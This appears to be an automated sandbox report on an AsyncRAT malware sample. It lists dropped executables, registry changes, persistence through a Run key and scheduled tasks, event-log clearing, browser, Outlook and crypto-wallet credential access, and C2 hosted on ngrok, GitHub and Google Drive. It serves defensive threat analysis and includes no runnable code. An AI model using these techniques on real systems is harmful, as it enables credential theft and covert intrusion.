asyncrat | 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation	._cache_New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation	gem1.exe

Executes dropped EXE 12 IoCs

pid	Process
1428	New Text Document mod.exe
1832	._cache_New Text Document mod.exe
1668	Synaptics.exe
2136	voidware_loader.exe
3324	build.exe
4332	DirectX111.exe
5572	gem2.exe
3808	gem1.exe
3240	gem1.exe
6048	New Text Document mod.exe
388	._cache_New Text Document mod.exe
6932	Lightshot.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe

Loads dropped DLL 4 IoCs

pid	Process
1668	Synaptics.exe
1668	Synaptics.exe
6048	New Text Document mod.exe
6048	New Text Document mod.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	New Text Document mod.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
58	drive.google.com
479	0.tcp.in.ngrok.io
482	raw.githubusercontent.com
728	0.tcp.in.ngrok.io
19	raw.githubusercontent.com
20	raw.githubusercontent.com
56	drive.google.com
148	drive.google.com
483	raw.githubusercontent.com
501	raw.githubusercontent.com
57	drive.google.com
144	drive.google.com
147	drive.google.com
458	raw.githubusercontent.com
522	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
558	api.ipify.org
681	api.ipify.org
686	ipinfo.io
371	api.ipify.org
372	api.ipify.org
497	ip-api.com

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5236	powercfg.exe
5512	powercfg.exe
5624	powercfg.exe
5620	powercfg.exe
5288	powercfg.exe
5612	powercfg.exe
5680	powercfg.exe
4932	powercfg.exe
7868	powercfg.exe
5408	cmd.exe
4448	powercfg.exe
5708	powercfg.exe
7764	powercfg.exe
7700	powercfg.exe
7864	powercfg.exe
8784	powercfg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	gem2.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3808 set thread context of 3240	3808	gem1.exe	137
PID 5572 set thread context of 5692	5572	gem2.exe	166

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/5612-2607-0x00007FF7C29B0000-0x00007FF7C29C7000-memory.dmp	upx
behavioral3/memory/5612-2862-0x00007FF7C29B0000-0x00007FF7C29C7000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5124	sc.exe
4672	sc.exe
5396	sc.exe
3816	sc.exe
4996	sc.exe
5304	sc.exe
3036	sc.exe
3560	sc.exe
2592	sc.exe
2896	sc.exe
5324	sc.exe
2824	sc.exe
1324	sc.exe
3876	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
5148	3808	WerFault.exe	135
9140	8008	WerFault.exe	290
8592	9016	WerFault.exe	298
4548	8412	WerFault.exe	304
9084	8008	WerFault.exe	290
8056	8568	WerFault.exe	319
4900	6988	WerFault.exe	420

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
8504	cmd.exe
6988	PING.EXE
4932	cmd.exe
2516	PING.EXE
5600	PING.EXE

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral3/files/0x00280000000464ac-4869.dat	nsis_installer_1
behavioral3/files/0x00280000000464ac-4869.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3444	taskkill.exe
9000	taskkill.exe

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry class 60 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "3"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 44003100000000002d5a248d10006100340009000400efbe2d5a0b8d2d5a248d2e000000b1610400000029000000000000000000000000000000a99061006100000010000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2516	PING.EXE
5600	PING.EXE
6988	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1144	schtasks.exe
7796	schtasks.exe
6568	schtasks.exe
3184	SCHTASKS.exe
